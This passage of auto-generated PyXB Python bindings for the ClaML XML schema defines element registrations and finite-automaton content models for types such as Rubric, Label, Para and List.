CTD_ANON_16._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Rubric'), CTD_ANON_19, scope=CTD_ANON_16, location=pyxb.utils.utility.Location('ClaML.xsd', 217, 4)))
CTD_ANON_16._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'History'), CTD_ANON_21, scope=CTD_ANON_16, location=pyxb.utils.utility.Location('ClaML.xsd', 236, 4)))
CTD_ANON_16._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'SuperClass'), CTD_ANON_22, scope=CTD_ANON_16, location=pyxb.utils.utility.Location('ClaML.xsd', 242, 4)))
CTD_ANON_16._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'SubClass'), CTD_ANON_23, scope=CTD_ANON_16, location=pyxb.utils.utility.Location('ClaML.xsd', 248, 4)))
def _BuildAutomaton_13 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_13
del _BuildAutomaton_13
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 172, 16))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 173, 16))
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 174, 16))
counters.add(cc_2)
cc_3 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 175, 16))
counters.add(cc_3)
cc_4 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 176, 16))
counters.add(cc_4)
cc_5 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 177, 16))
counters.add(cc_5)
cc_6 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 178, 16))
counters.add(cc_6)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_16._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Meta')), pyxb.utils.utility.Location('ClaML.xsd', 172, 16))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_16._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'SuperClass')), pyxb.utils.utility.Location('ClaML.xsd', 173, 16))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_2, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_16._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'SubClass')), pyxb.utils.utility.Location('ClaML.xsd', 174, 16))
st_2 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_3, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_16._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'ModifiedBy')), pyxb.utils.utility.Location('ClaML.xsd', 175, 16))
st_3 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_4, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_16._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'ExcludeModifier')), pyxb.utils.utility.Location('ClaML.xsd', 176, 16))
st_4 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_5, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_16._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Rubric')), pyxb.utils.utility.Location('ClaML.xsd', 177, 16))
st_5 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_5)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_6, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_16._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'History')), pyxb.utils.utility.Location('ClaML.xsd', 178, 16))
st_6 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_6)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_1, False) ]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_2, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_2, False) ]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_3, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_3, False) ]))
st_3._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_4, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_4, False) ]))
st_4._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_5, True) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_5, False) ]))
st_5._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_6, True) ]))
st_6._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
CTD_ANON_16._Automaton = _BuildAutomaton_13()
CTD_ANON_19._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Label'), CTD_ANON_20, scope=CTD_ANON_19, location=pyxb.utils.utility.Location('ClaML.xsd', 228, 4)))
CTD_ANON_19._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'History'), CTD_ANON_21, scope=CTD_ANON_19, location=pyxb.utils.utility.Location('ClaML.xsd', 236, 4)))
def _BuildAutomaton_14 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_14
del _BuildAutomaton_14
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 221, 16))
counters.add(cc_0)
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(CTD_ANON_19._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Label')), pyxb.utils.utility.Location('ClaML.xsd', 220, 16))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_19._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'History')), pyxb.utils.utility.Location('ClaML.xsd', 221, 16))
st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
transitions = []
transitions.append(fac.Transition(st_0, [
]))
transitions.append(fac.Transition(st_1, [
]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True) ]))
st_1._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON_19._Automaton = _BuildAutomaton_14()
CTD_ANON_20._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Reference'), CTD_ANON_24, scope=CTD_ANON_20, location=pyxb.utils.utility.Location('ClaML.xsd', 254, 4)))
CTD_ANON_20._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Para'), CTD_ANON_25, scope=CTD_ANON_20, location=pyxb.utils.utility.Location('ClaML.xsd', 264, 4)))
CTD_ANON_20._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Fragment'), CTD_ANON_40, scope=CTD_ANON_20, location=pyxb.utils.utility.Location('ClaML.xsd', 270, 4)))
CTD_ANON_20._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Include'), CTD_ANON_26, scope=CTD_ANON_20, location=pyxb.utils.utility.Location('ClaML.xsd', 285, 4)))
CTD_ANON_20._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'IncludeDescendants'), CTD_ANON_27, scope=CTD_ANON_20, location=pyxb.utils.utility.Location('ClaML.xsd', 291, 4)))
CTD_ANON_20._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'List'), CTD_ANON_28, scope=CTD_ANON_20, location=pyxb.utils.utility.Location('ClaML.xsd', 297, 4)))
CTD_ANON_20._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Table'), CTD_ANON_30, scope=CTD_ANON_20, location=pyxb.utils.utility.Location('ClaML.xsd', 317, 4)))
CTD_ANON_20._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Term'), CTD_ANON_37, scope=CTD_ANON_20, location=pyxb.utils.utility.Location('ClaML.xsd', 380, 4)))
def _BuildAutomaton_15 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_15
del _BuildAutomaton_15
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 230, 12))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('ClaML.xsd', 6, 12))
counters.add(cc_1)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_20._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Reference')), pyxb.utils.utility.Location('ClaML.xsd', 7, 16))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_20._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Term')), pyxb.utils.utility.Location('ClaML.xsd', 8, 16))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_20._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Para')), pyxb.utils.utility.Location('ClaML.xsd', 15, 12))
st_2 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_20._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Include')), pyxb.utils.utility.Location('ClaML.xsd', 16, 12))
st_3 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_20._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'IncludeDescendants')), pyxb.utils.utility.Location('ClaML.xsd', 17, 12))
st_4 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_20._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Fragment')), pyxb.utils.utility.Location('ClaML.xsd', 18, 12))
st_5 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_5)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_20._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'List')), pyxb.utils.utility.Location('ClaML.xsd', 19, 12))
st_6 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_6)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_20._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Table')), pyxb.utils.utility.Location('ClaML.xsd', 20, 12))
st_7 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_7)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_0, True) ]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_0, True) ]))
st_3._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_0, True) ]))
st_4._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_0, True) ]))
st_5._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_0, True) ]))
st_6._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_0, True) ]))
st_7._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
CTD_ANON_20._Automaton = _BuildAutomaton_15()
def _BuildAutomaton_16 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_16
del _BuildAutomaton_16
import pyxb.utils.fac as fac
counters = set()
states = []
return fac.Automaton(states, counters, True, containing_state=None)
CTD_ANON_21._Automaton = _BuildAutomaton_16()
def _BuildAutomaton_17 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_17
del _BuildAutomaton_17
import pyxb.utils.fac as fac
counters = set()
states = []
return fac.Automaton(states, counters, True, containing_state=None)
CTD_ANON_24._Automaton = _BuildAutomaton_17()
CTD_ANON_25._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Reference'), CTD_ANON_24, scope=CTD_ANON_25, location=pyxb.utils.utility.Location('ClaML.xsd', 254, 4)))
CTD_ANON_25._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Term'), CTD_ANON_37, scope=CTD_ANON_25, location=pyxb.utils.utility.Location('ClaML.xsd', 380, 4)))
def _BuildAutomaton_18 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_18
del _BuildAutomaton_18
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 266, 12))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('ClaML.xsd', 6, 12))
counters.add(cc_1)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_25._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Reference')), pyxb.utils.utility.Location('ClaML.xsd', 7, 16))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_25._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Term')), pyxb.utils.utility.Location('ClaML.xsd', 8, 16))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
st_1._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
CTD_ANON_25._Automaton = _BuildAutomaton_18()
CTD_ANON_28._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ListItem'), CTD_ANON_29, scope=CTD_ANON_28, location=pyxb.utils.utility.Location('ClaML.xsd', 305, 4)))
def _BuildAutomaton_19 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_19
del _BuildAutomaton_19
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(CTD_ANON_28._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'ListItem')), pyxb.utils.utility.Location('ClaML.xsd', 300, 16))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON_28._Automaton = _BuildAutomaton_19()
CTD_ANON_29._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Reference'), CTD_ANON_24, scope=CTD_ANON_29, location=pyxb.utils.utility.Location('ClaML.xsd', 254, 4)))
CTD_ANON_29._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Para'), CTD_ANON_25, scope=CTD_ANON_29, location=pyxb.utils.utility.Location('ClaML.xsd', 264, 4)))
CTD_ANON_29._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Include'), CTD_ANON_26, scope=CTD_ANON_29, location=pyxb.utils.utility.Location('ClaML.xsd', 285, 4)))
CTD_ANON_29._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'List'), CTD_ANON_28, scope=CTD_ANON_29, location=pyxb.utils.utility.Location('ClaML.xsd', 297, 4)))
CTD_ANON_29._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Table'), CTD_ANON_30, scope=CTD_ANON_29, location=pyxb.utils.utility.Location('ClaML.xsd', 317, 4)))
CTD_ANON_29._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Term'), CTD_ANON_37, scope=CTD_ANON_29, location=pyxb.utils.utility.Location('ClaML.xsd', 380, 4)))
def _BuildAutomaton_20 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_20
del _BuildAutomaton_20
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 307, 12))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('ClaML.xsd', 6, 12))
counters.add(cc_1)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_29._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Reference')), pyxb.utils.utility.Location('ClaML.xsd', 7, 16))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_29._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Term')), pyxb.utils.utility.Location('ClaML.xsd', 8, 16))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_29._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Para')), pyxb.utils.utility.Location('ClaML.xsd', 309, 16))
st_2 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_29._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Include')), pyxb.utils.utility.Location('ClaML.xsd', 310, 16))
st_3 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_29._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'List')), pyxb.utils.utility.Location('ClaML.xsd', 311, 16))
st_4 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_29._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Table')), pyxb.utils.utility.Location('ClaML.xsd', 312, 16))
st_5 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_5)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, True),
